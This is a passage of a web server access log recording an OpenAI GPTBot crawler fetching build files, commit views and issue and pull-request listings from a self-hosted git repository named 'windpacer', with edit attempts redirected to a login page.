"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26377] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26379] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26378] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26375] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26378] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26375] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11528] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 21618] [Gzip 10.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 14112] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15221] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 11119] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:47:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:47:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:47:48 +0000] - 303 303 - GET https 